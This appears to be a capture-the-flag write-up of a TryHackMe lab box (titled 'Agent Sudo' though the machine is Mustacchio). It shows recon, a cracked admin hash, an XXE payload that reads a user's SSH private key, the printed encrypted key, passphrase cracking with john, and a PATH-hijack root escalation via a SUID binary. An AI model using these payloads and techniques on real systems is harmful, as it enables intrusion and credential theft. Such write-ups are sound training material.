# CTF TryHackMe - Agent Sudo

## Nmap

```bash
# Nmap 7.91 scan initiated Thu Jun 17 21:02:34 2021 as: nmap -sC -sV -oN nmap.log 10.10.160.100
Nmap scan report for 10.10.160.100
Host is up (0.14s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 58:1b:0c:0f:fa:cf:05:be:4c:c0:7a:f1:f1:88:61:1c (RSA)
|   256 3c:fc:e8:a3:7e:03:9a:30:2c:77:e0:0a:1c:e4:52:e6 (ECDSA)
|_  256 9d:59:c6:c7:79:c5:54:c4:1d:aa:e4:d1:84:71:01:92 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Using GoBuster to bruteforce web dir
```bash
gobuster dir -u http://10.10.160.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.160.100
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/06/17 21:08:22 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 315] [--> http://10.10.160.100/images/]
/custom               (Status: 301) [Size: 315] [--> http://10.10.160.100/custom/]
```

go to http://10.10.160.100/custom/js/

We discover **users.bak**

Check what is the file :

```bash
file users.bak   
users.bak: SQLite 3.x database, last written using SQLite version 3034001
```

## Open database with sqlite3
```bash 
sqlite3 users.bak
```
Then dump database
```bash
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE users(username text NOT NULL, password text NOT NULL);
INSERT INTO users VALUES('admin','1868e36a6d2b17d4c2745f1659433a54d4bc5f4b');
COMMIT;
```

Cool, We got hash of admin user
```
admin
1868e36a6d2b17d4c2745f1659433a54d4bc5f4b
```

Decrypt password
```
1868e36a6d2b17d4c2745f1659433a54d4bc5f4b	sha1	bulldog19
```
The admin password is **bulldog19**


## Launch nmap scan on all ports 

I decided to launch nmap on all ports because i have nothing else to check/exploit
```bash
nmap -sC -sV -p- -v -oN nmap_all_ports.log 10.10.160.100
Discovered open port 8765/tcp on 10.10.160.100

So nmap on this specific port
nmap -sC -sV -p 8765 10.10.160.100                   
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-17 21:26 CEST
Stats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for mustacchio.thm (10.10.160.100)
Host is up (0.054s latency).

PORT     STATE SERVICE VERSION
8765/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.61 seconds
```

We got an nginx web site on **http://10.10.160.100:8765** it's an admin panel

i used creds, discovered before

```
admin:bulldog19
```

It's works we are connected!!

## Check source code, we see this script : 
```
//document.cookie = "Example=/auth/dontforget.bak"; 
      function checktarea() {
      let tbox = document.getElementById("box").value;
      if (tbox == null || tbox.length == 0) {
        alert("Insert XML Code!")
```

And this comment
```
<!-- Barry, you can now SSH in using your key!-->
```

We have a potential username : **Barry**

## Dir discovery using gobuster
Go to http://10.10.160.100:8765/auth/dontforget.bak and download dontforget.bak file

content of file (nothing interesting)
```
<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I couldâ€™ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You couldâ€™ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
```

## XXE exploit
This is xml format. So try to exploit this with xxe.

Place this into "Add a comment on the website." section
```
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY ent SYSTEM "file:///home/barry/.ssh/id_rsa"> ]><comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>&ent;</com>
</comment>
```

And then, submit. We got the ssh key :D
```
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,D137279D69A43E71BB7FCB87FC61D25E

jqDJP+blUr+xMlASYB9t4gFyMl9VugHQJAylGZE6J/b1nG57eGYOM8wdZvVMGrfN
bNJVZXj6VluZMr9uEX8Y4vC2bt2KCBiFg224B61z4XJoiWQ35G/bXs1ZGxXoNIMU
MZdJ7DH1k226qQMtm4q96MZKEQ5ZFa032SohtfDPsoim/7dNapEOujRmw+ruBE65
l2f9wZCfDaEZvxCSyQFDJjBXm07mqfSJ3d59dwhrG9duruu1/alUUvI/jM8bOS2D
Wfyf3nkYXWyD4SPCSTKcy4U9YW26LG7KMFLcWcG0D3l6l1DwyeUBZmc8UAuQFH7E
NsNswVykkr3gswl2BMTqGz1bw/1gOdCj3Byc1LJ6mRWXfD3HSmWcc/8bHfdvVSgQ
ul7A8ROlzvri7/WHlcIA1SfcrFaUj8vfXi53fip9gBbLf6syOo0zDJ4Vvw3ycOie
TH6b6mGFexRiSaE/u3r54vZzL0KHgXtapzb4gDl/yQJo3wqD1FfY7AC12eUc9NdC
rcvG8XcDg+oBQokDnGVSnGmmvmPxIsVTT3027ykzwei3WVlagMBCOO/ekoYeNWlX
bhl1qTtQ6uC1kHjyTHUKNZVB78eDSankoERLyfcda49k/exHZYTmmKKcdjNQ+KNk
4cpvlG9Qp5Fh7uFCDWohE/qELpRKZ4/k6HiA4FS13D59JlvLCKQ6IwOfIRnstYB8
7+YoMkPWHvKjmS/vMX+elcZcvh47KNdNl4kQx65BSTmrUSK8GgGnqIJu2/G1fBk+
T+gWceS51WrxIJuimmjwuFD3S2XZaVXJSdK7ivD3E8KfWjgMx0zXFu4McnCfAWki
ahYmead6WiWHtM98G/hQ6K6yPDO7GDh7BZuMgpND/LbS+vpBPRzXotClXH6Q99I7
LIuQCN5hCb8ZHFD06A+F2aZNpg0G7FsyTwTnACtZLZ61GdxhNi+3tjOVDGQkPVUs
pkh9gqv5+mdZ6LVEqQ31eW2zdtCUfUu4WSzr+AndHPa2lqt90P+wH2iSd4bMSsxg
laXPXdcVJxmwTs+Kl56fRomKD9YdPtD4Uvyr53Ch7CiiJNsFJg4lY2s7WiAlxx9o
vpJLGMtpzhg8AXJFVAtwaRAFPxn54y1FITXX6tivk62yDRjPsXfzwbMNsvGFgvQK
DZkaeK+bBjXrmuqD4EB9K540RuO6d7kiwKNnTVgTspWlVCebMfLIi76SKtxLVpnF
6aak2iJkMIQ9I0bukDOLXMOAoEamlKJT5g+wZCC5aUI6cZG0Mv0XKbSX2DTmhyUF
ckQU/dcZcx9UXoIFhx7DesqroBTR6fEBlqsn7OPlSFj0lAHHCgIsxPawmlvSm3bs
7bdofhlZBjXYdIlZgBAqdq5jBJU8GtFcGyph9cb3f+C3nkmeDZJGRJwxUYeUS9Of
1dVkfWUhH2x9apWRV8pJM/ByDd0kNWa/c//MrGM0+DKkHoAZKfDl3sC0gdRB7kUQ
+Z87nFImxw95dxVvoZXZvoMSb7Ovf27AUhUeeU8ctWselKRmPw56+xhObBoAbRIn
7mxN/N5LlosTefJnlhdIhIDTDMsEwjACA+q686+bREd+drajgk6R9eKgSME7geVD
-----END RSA PRIVATE KEY-----
```

## Crack ssh passphrase
we need passphrase. So let's use ssh2john

```bash
python /usr/share/john/ssh2john.py barry.ssh > barry-ssh.hash

john --wordlist=/usr/share/wordlists/rockyou.txt barry-ssh.hash 
urieljames       (barry.ssh)
```
## Get SSH Access as barry
```
ssh -i barry.ssh barry@10.10.7.185
```
and we are in

## Trying to privesc

List SUID permissions
```bash
find / -user root -perm -4000 -print 2>/dev/null
```
See **/home/joe/live_log**

If we strings this we see **tail** command is used
```
Live Nginx Log Reader                                                                                                
tail -f /var/log/nginx/access.log
```

## Privilege Escalation
We can Privilege Escalation Using PATH Variable

```bash
cd /tmp
echo "#!/bin/bash" >> tail
echo "/bin/bash" >> tail
chmod +x tail

export PATH=/tmp/:$PATH

cd /home/joe
./live_log
```

and we'r root

